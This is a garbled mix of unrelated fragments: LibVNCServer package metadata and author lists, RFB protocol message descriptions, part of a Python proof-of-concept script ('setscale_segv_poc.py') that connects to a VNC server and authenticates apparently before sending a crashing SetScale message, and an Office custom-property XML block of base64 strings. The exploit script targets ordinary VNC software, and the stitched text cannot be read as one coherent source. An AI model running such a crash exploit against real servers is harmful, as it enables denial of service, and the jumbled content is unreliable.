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vncserver 0.9.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igned-off-by: Johannes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roshi Ichikawa &lt;http://gimite.net/en/&gt; License: New BSD License Reference: http://dev.w3.org/html5/websockets/ Reference: http://tools.ietf.org/html/rfc64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Network Packager: Johannes.Schindelin &lt;Johannes.Schindelin@gmx.de&gt; Source: %{name}-%{version}.tar.gz BuildRoot: %{_tmppath}/%{name}-%{version}-build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US Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py &lt;host&gt; &lt;port&gt; password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\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rik Mo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with Reserved Font Name Orbit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rl J. Runge &lt;runge@karlrung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rgen Ibsen / Jib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Landmark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Van Hoof &lt;philip@codeminde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B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ian Beier &lt;dontmind@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rnot Tenc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c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Mateus Cesar Gro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lt;rokumar@novell.com&gt;,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lt;Johannes.Schindelin@gmx.de&gt;, Karl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ndmark Graph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SetScale Factor message SetScaleFactor - tell the RFB server to alter the scale factor for the client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ResizeFrameBuffer message ReSizeFrameBuffer - tell the RFB client to alter its framebuffer, either due to a resize of the server desktop or a client-requested scaling factor. The pixel format remains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2004,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3VTxHW9/1tLx95AiTJBMjyfi34FJcXzIyoMuAzj+9f48RePg6YG1kfLPa3ZOORmWZGFZEr
YlUE0WtRAFIyS5AQpZhoYhxiDP3b9T7ZD578IR6EQB4KnFMLlrZ7s5vhrvBuenjO9vAWtKJn
iYuDUw3Ws9vrfQyJJI+PEqmKx5PX4PnTQtUxZ1lrJwhBmlbvvAWHdyy8T2OfURHMFvZyKZbN
m80gHUI/ENxI+nrJrJ</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_2015_ms_pID_7253431">
    <vt:lpwstr>Td0XSXPu9SH0VBtc+LKaGu4ZskH4vLSMaSKwEhZ7mjGZr5xh2df+68
SYtAUkECjA0dzGvv181DX6S7vtnsA5UFBHeai2frHge/TxB6J0M+sncPrARJ6Qs47vdqpPDu
viYoYp1EEXZEJTx0px0QbbDugUVja7KAA0LjZ45L4FVep2jNgpOFwDJ8n/AeP4girN4/ij0H
71aa/0sTDHdi47IsIvbmp1RjDRd7y4219xdt</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_2015_ms_pID_7253431_00">
    <vt:lpwstr>_2015_ms_pID_7253431</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_2015_ms_pID_7253432">
    <vt:lpwstr>NvW4TbU5qQ5eyR9yw0ioc/y5Tbvs/Uj83N3z
XrVsjMQKYcc1YwYXnXnCuNfC0c4MYKcLGSXTVzEWGSwIBnnK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